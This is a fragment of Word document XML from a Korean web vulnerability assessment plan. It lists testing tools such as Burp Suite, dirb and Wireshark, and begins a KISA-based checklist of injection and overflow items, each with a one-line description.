      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EA215A3" w14:textId="1E79525B" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc206630342"/>
      <w:bookmarkStart w:id="38" w:name="_Toc206630480"/>
      <w:bookmarkStart w:id="39" w:name="_Toc209094667"/>
      <w:r>
        <w:t xml:space="preserve">[표]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3</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 진단 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인력</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="4B24C24A" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:snapToGrid/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E73F0" w14:textId="77777777" w:rsidR="00B75ECF" w:rsidRDefault="0068769E" w:rsidP="00B75ECF">
      <w:pPr>
        <w:pStyle w:val="Level1TitleCtl1"/>
        <w:ind w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc206601954"/>
      <w:bookmarkStart w:id="41" w:name="_Toc209094543"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>진단 항목 및 도구</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="62F29CF8" w14:textId="77777777" w:rsidR="00B75ECF" w:rsidRDefault="00802A7F" w:rsidP="009E4926">
      <w:pPr>
        <w:pStyle w:val="Level2TitleCtl2"/>
        <w:ind w:left="426" w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc206601955"/>
      <w:bookmarkStart w:id="43" w:name="_Toc209094544"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점진단</w:t>
      </w:r>
      <w:r w:rsidR="00B75ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 진단 도구</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="107CCDAF" w14:textId="77777777" w:rsidR="00B75ECF" w:rsidRDefault="00802A7F" w:rsidP="00B75ECF">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점진단</w:t>
      </w:r>
      <w:r w:rsidR="00B75ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의</w:t>
      </w:r>
      <w:r w:rsidR="00B75ECF">
        <w:t xml:space="preserve"> 특성상 툴을 이용한 진단은 정확도가 떨어지며 상황 별 판단이 필요하므로 대부분 </w:t>
      </w:r>
      <w:r>
        <w:t>취약점진단</w:t>
      </w:r>
      <w:r w:rsidR="00B75ECF">
        <w:t xml:space="preserve"> 전문인력이 수동으로 진단합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEB6228" w14:textId="77777777" w:rsidR="00B75ECF" w:rsidRDefault="00802A7F" w:rsidP="00B75ECF">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점진단</w:t>
      </w:r>
      <w:r w:rsidR="00B75ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을</w:t>
      </w:r>
      <w:r w:rsidR="00B75ECF">
        <w:t xml:space="preserve"> 수행하기 위해 사용되는 도구들을 정리하면 다음과 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9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8"/>
        <w:gridCol w:w="6662"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B75ECF" w:rsidRPr="001E369F" w14:paraId="65B7174F" w14:textId="77777777" w:rsidTr="00B75ECF">
        <w:trPr>
          <w:trHeight w:val="397"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2438" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4721591F" w14:textId="77777777" w:rsidR="00B75ECF" w:rsidRPr="00B67D63" w:rsidRDefault="00B75ECF" w:rsidP="00DE7BFE">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B67D63">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>구분</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6564C3C4" w14:textId="77777777" w:rsidR="00B75ECF" w:rsidRPr="00B67D63" w:rsidRDefault="00B75ECF" w:rsidP="00DE7BFE">
            <w:pPr>
              <w:pStyle w:val="TitleCtSht"/>
              <w:wordWrap/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B67D63">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>진단 항목 설명</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w:rsidRPr="009B34B0" w14:paraId="5444877B" w14:textId="77777777" w:rsidTr="00544384">
        <w:trPr>
          <w:trHeight w:val="726"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2438" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C061B20" w14:textId="64DFE25A" w:rsidR="00F973D4" w:rsidRPr="009A6EFB" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="002E13A5">
              <w:t xml:space="preserve">Burp Suite </w:t>
            </w:r>
            <w:r w:rsidRPr="009A6EFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/ Burp proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="514B63E7" w14:textId="7BC21F47" w:rsidR="00F973D4" w:rsidRPr="009B34B0" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
            </w:pPr>
            <w:r w:rsidRPr="009B34B0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Proxy 기능을 이용한 웹 세션 조작 도구</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w:rsidRPr="009B34B0" w14:paraId="695868D9" w14:textId="77777777" w:rsidTr="00544384">
        <w:trPr>
          <w:trHeight w:val="698"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2438" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="640E6F78" w14:textId="121A9875" w:rsidR="00F973D4" w:rsidRPr="009A6EFB" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00704BBB">
              <w:t>d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="00704BBB">
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1450584E" w14:textId="32655D3A" w:rsidR="00F973D4" w:rsidRPr="009B34B0" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>브루트포싱 방식의 디렉터리</w:t>
            </w:r>
            <w:r>
              <w:t>·파일</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 점검 도구</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w:rsidRPr="009B34B0" w14:paraId="11BD3597" w14:textId="77777777" w:rsidTr="00544384">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2438" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FBB35BA" w14:textId="77777777" w:rsidR="00F973D4" w:rsidRPr="009A6EFB" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="009A6EFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C092C29" w14:textId="77777777" w:rsidR="00F973D4" w:rsidRPr="0096660E" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
            </w:pPr>
            <w:r w:rsidRPr="0096660E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>네트워</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>크</w:t>
            </w:r>
            <w:r w:rsidRPr="0096660E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 패킷 점검 도구</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16F00A06" w14:textId="77777777" w:rsidR="00F973D4" w:rsidRPr="009B34B0" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
            </w:pPr>
            <w:r w:rsidRPr="0096660E">
              <w:t>http://www.wireshark.com/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F973D4" w:rsidRPr="009B34B0" w14:paraId="05CD4576" w14:textId="77777777" w:rsidTr="00544384">
        <w:trPr>
          <w:trHeight w:val="706"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2438" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22BD982E" w14:textId="77777777" w:rsidR="00F973D4" w:rsidRPr="009A6EFB" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="009A6EFB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>기타</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6662" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E83EAA3" w14:textId="77777777" w:rsidR="00F973D4" w:rsidRPr="009B34B0" w:rsidRDefault="00F973D4" w:rsidP="00F973D4">
            <w:pPr>
              <w:wordWrap/>
            </w:pPr>
            <w:r w:rsidRPr="009B34B0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>진단자가 작성한 Exploit Code</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 및 Script, 기타 점검 도구</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EEE75F7" w14:textId="0FF7E4B2" w:rsidR="00B75ECF" w:rsidRDefault="00B75ECF" w:rsidP="00B75ECF">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:wordWrap/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc206630343"/>
      <w:bookmarkStart w:id="45" w:name="_Toc206630481"/>
      <w:bookmarkStart w:id="46" w:name="_Toc209094668"/>
      <w:r>
        <w:t xml:space="preserve">[표]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4</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진단 도구</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="0D30641E" w14:textId="77777777" w:rsidR="00B75ECF" w:rsidRPr="00D86F0B" w:rsidRDefault="00B75ECF" w:rsidP="00B75ECF"/>
    <w:p w14:paraId="147D8F25" w14:textId="77777777" w:rsidR="00B75ECF" w:rsidRDefault="00B75ECF" w:rsidP="009E4926">
      <w:pPr>
        <w:pStyle w:val="Level2TitleCtl2"/>
        <w:ind w:left="426" w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc206601956"/>
      <w:bookmarkStart w:id="48" w:name="_Toc209094545"/>
      <w:r w:rsidRPr="00F12DA5">
        <w:t>진단 항목</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="2FE9336B" w14:textId="1688F480" w:rsidR="00B75ECF" w:rsidRDefault="000B7CBB" w:rsidP="00B75ECF">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r w:rsidRPr="000B7CBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>진단에</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7CBB">
        <w:t xml:space="preserve"> 사용될 체크리스트는 KISA 한국인터넷진흥원에서 제공하는 「주요정보통신기반시설 기술적 취약점 분석·평가 방법 상세가이드」를 기반으로 작성되었습니다. 가이드라인에서의 영역은 총 1개 영역에서 28개 항목으로 구성하였습니다.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8864"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2410"/>
        <w:gridCol w:w="5812"/>
      </w:tblGrid>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="6F4923C9" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="531"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1327146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구분</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D457C7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진단 항목</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DC3E586"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진단 항목 설명</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="79EBEB33" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63EEDB9D"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D6C1124"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버퍼 오버플로우</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15DA7CA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사용자가 입력한 파라미터 값의 문자열 길이 제한 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="15A0B9B4" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AAB050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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DEBCC6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포맷스트링</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A0D91D8"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포맷스트링과 이것을 사용하는 printf() 함수의 취약점을 이용하여 RET의 위치에 셸 코드의 주소를 읽어 셸을 획득하는 공격</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="2CA8AC71" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5200E4A3"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07502E8A"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LDAP 인젝션</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A161822" w14:textId="77777777" w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w:rsidRDefault="000B7CBB" w:rsidP="004D3796">
            <w:pPr>
              <w:widowControl/>
              <w:overflowPunct w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:snapToGrid/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002E13A5">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>웹 애플리케이션을 악용하여 민감한 사용자 정보를 노출하거나 LDAP (Lightweight Directory Access Protocol) 데이터 저장소에 표시된 정보를 수정할 수 있는 코드 주입 공격</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="2FFA34C6" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DEC279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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47B7C31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운영체제 명령 실행</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FC33CA3"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3B6210">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="바탕" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>웹에서</w:t>
            </w:r>
            <w:r w:rsidRPr="003B6210">
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="바탕"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> system(), exec() 등의 시스템 명령어 실행</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="바탕" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 여부 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="4BEF6374" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CC757A3"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7679DB8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SQL 인젝션</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BE7F002"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응용 프로그램 보안 상의 허점을 의도적으로 이용해 악의적인 SQL문을 실행되게 함으로써 데이터베이스를 비정상적으로 조작하는 코드 인젝션 공격</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="바탕" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="113F058C" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39C7341B"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lastRenderedPageBreak/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A26B6EB"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SSI 인젝션</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A44174F"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시스템 권한을 가지지 못한 일반 사용자도 시스템 명령을 삽입할 수 있는 공격</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="266DF2D8" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="642" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39C4892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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43CE66F9"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XPath 인젝션</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5812" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60513513"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애플리케이션의 보안 취약점을 이용하여 공격자가 악의적인 XPath 쿼리를 주입하고 실행할 수 있는 공격</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7CBB" w:rsidRPr="002E13A5" w14:paraId="145FA664" w14:textId="77777777" w:rsidTr="004D3796">
        <w:trPr>
